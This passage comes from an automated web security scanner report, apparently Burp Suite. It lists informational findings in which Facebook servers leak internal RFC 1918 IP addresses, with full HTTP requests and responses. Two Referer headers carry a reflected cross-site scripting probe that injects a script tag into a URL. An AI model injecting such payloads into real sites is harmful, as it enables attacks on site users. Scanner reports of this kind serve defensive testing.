Last-Modified: Mon, 06 Jun 2011 02:36:40 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 27683
Vary: Accept-Encoding
Cache-Control: public, max-age=30986031
Expires: Wed, 06 Jun 2012 02:47:00 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close

/*1307414838,169776321*/

.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:white}
.fan_box .full_widget .connect_top
...[SNIP]...

22.43. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yQ/r/dYwII2uSVbM.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

GET /rsrc.php/v1/yQ/r/dYwII2uSVbM.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 22:00:30 GMT
X-FB-Server: 10.138.17.186
Content-Length: 4774
Vary: Accept-Encoding
Cache-Control: public, max-age=28810499
Expires: Fri, 11 May 2012 22:07:06 GMT
Date: Mon, 13 Jun 2011 11:12:07 GMT
Connection: close

/*1305238045,176820666*/

body.external{background:transparent none repeat scroll 0 0;margin:0;padding:0}
.wallkit_frame{}
.wallkit_frame .inputsubmit-disabled{background-color:#fff;border-bottom:1px
...[SNIP]...

22.44. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/bQKCJas2cuT.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /rsrc.php/v1/yR/r/bQKCJas2cuT.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:36:29 GMT
X-FB-Server: 10.138.69.183
Content-Length: 12229
Vary: Accept-Encoding
Cache-Control: public, max-age=30901298
Expires: Tue, 05 Jun 2012 02:53:45 GMT
Date: Mon, 13 Jun 2011 11:12:07 GMT
Connection: close

/*1307328785,176833975*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

22.45. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/-uzFkmw0aKD.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/-uzFkmw0aKD.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yW/r/-uzFkmw0aKD.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 09 Jun 2011 20:13:02 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 55415
Vary: Accept-Encoding
Cache-Control: public, max-age=31223894
Expires: Fri, 08 Jun 2012 20:30:22 GMT
Date: Mon, 13 Jun 2011 11:12:08 GMT
Connection: close

/*1307651430,169776320*/

if (window.CavalryLogger) { CavalryLogger.start_js(["zaoLK"]); }

function ProfileSideNav(){this.parent.construct(this);}ProfileSideNav.extend('SideNav');ProfileSideNav.proto
...[SNIP]...

22.46. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/yW/r/ZwGc6Ghug0y.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 22:00:17 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 7980
Vary: Accept-Encoding
Cache-Control: public, max-age=28810427
Expires: Fri, 11 May 2012 22:05:54 GMT
Date: Mon, 13 Jun 2011 11:12:07 GMT
Connection: close

/*1305238039,169776066*/

.pagerpro_container{float:right;margin:0 0 0 0;padding:3px 0 4px 0;width:200px}
.pagerpro{float:right}
.pagerpro .pagerpro_li{display:inline}
.pagerpro .pagerpro_a{padding:3p
...[SNIP]...

22.47. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yY/r/4zEIrWluYBR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yY/r/4zEIrWluYBR.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 08 Jun 2011 22:26:24 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 13324
Vary: Accept-Encoding
Cache-Control: public, max-age=31147618
Expires: Thu, 07 Jun 2012 23:19:05 GMT
Date: Mon, 13 Jun 2011 11:12:07 GMT
Connection: close

/*1307575130,169776065*/

.interaction_form div.dialog_content{border-width:0}
.interaction_dialog_body{border-bottom:1px solid #ccc}
.interaction_form_body{padding:0;border-bottom:none}
.interaction_
...[SNIP]...

22.48. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/nIpljRV8xB5.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yl/r/nIpljRV8xB5.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/yl/r/nIpljRV8xB5.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/send.php?api_key=249141081161&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1947eb01%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.mavsmoneyball.com%252F2011%252F6%252F12%252F2220848%252Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&locale=en_US&sdk=joey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 08 Jun 2011 07:38:32 GMT
X-FB-Server: 10.138.64.184
Content-Length: 168106
Vary: Accept-Encoding
Cache-Control: public, max-age=31120748
Expires: Thu, 07 Jun 2012 15:41:47 GMT
Date: Mon, 13 Jun 2011 11:02:39 GMT
Connection: close

/*1307547697,176832696*/

if (window.CavalryLogger) { CavalryLogger.start_js(["0\/D8u"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('set
...[SNIP]...

22.49. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /rsrc.php/v1/yx/r/hnAKuJ5eYKY.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:35:37 GMT
X-FB-Server: 10.138.16.181
Content-Length: 51339
Vary: Accept-Encoding
Cache-Control: public, max-age=30899696
Expires: Tue, 05 Jun 2012 02:48:05 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close

/*1307328499,176820405*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

22.50. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/OJBsowkZPti.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/yy/r/OJBsowkZPti.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 31 May 2011 21:05:51 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 60987
Vary: Accept-Encoding
Cache-Control: public, max-age=30451009
Expires: Wed, 30 May 2012 22:09:58 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close

/*1306879766,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dO6dA"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

22.51. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/t4syXsnV4WE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/t4syXsnV4WE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yy/r/t4syXsnV4WE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:56:45 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 843
Cache-Control: public, max-age=28810357
Expires: Fri, 11 May 2012 22:04:45 GMT
Date: Mon, 13 Jun 2011 11:12:08 GMT
Connection: close

/*1305238026,169775815*/

if (window.CavalryLogger) { CavalryLogger.start_js(["7wgnO"]); }

function CIWebmailBootloader(a,b){this.controllerFn=b;var c=Event.listen(a,'mouseover',function(){c.remove()
...[SNIP]...

22.52. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.185

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:52:55 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Content-Length: 1900
Vary: Accept-Encoding
Cache-Control: public, max-age=23703624
Expires: Tue, 13 Mar 2012 19:53:28 GMT
Date: Mon, 13 Jun 2011 11:33:04 GMT
Connection: close

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

22.53. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.193.115

Request

GET /extern/login_status.php?api_key=119370714775514&app_id=119370714775514&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df982fd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20edf4cac%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1415cbfe4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ed2904b8%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1415cbfe4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37aae0738%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1415cbfe4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df478d8ce8%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1415cbfe4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.193.115
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:34 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f37aae0738&origin=http\u00253A\u00252F\u00252Fwww.tvfanatic.com\u00252Ffa7644554&relation=parent&transport=postmessage&frame=f1415cbfe4", "http:\
...[SNIP]...

22.54. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.234.50

Request

Response

22.55. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.55.23

Request

GET /extern/login_status.php?api_key=119370714775514&app_id=119370714775514&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10a07f187b1b4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df528e8cfeeb6be%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39ae003693210e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff3ada2af690c%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39ae003693210e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df268da217d98a0a%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39ae003693210e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a702ea58cd1a%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39ae003693210e&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.55.23
X-Cnection: close
Date: Mon, 13 Jun 2011 11:32:52 GMT
Content-Length: 267

<script type="text/javascript">
parent.postMessage("cb=f268da217d98a0a&origin=http\u00253A\u00252F\u00252Fwww.tvfanatic.com\u00252Ff22c4a3b34dfc98&relation=parent&transport=postmessage&frame=f39ae0036
...[SNIP]...

22.56. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.199.113

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff05fef88%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c3b700e8%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38aac6758%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28480bb38%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38aac6758&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df257f79508%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38aac6758&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbea4e438%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38aac6758&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
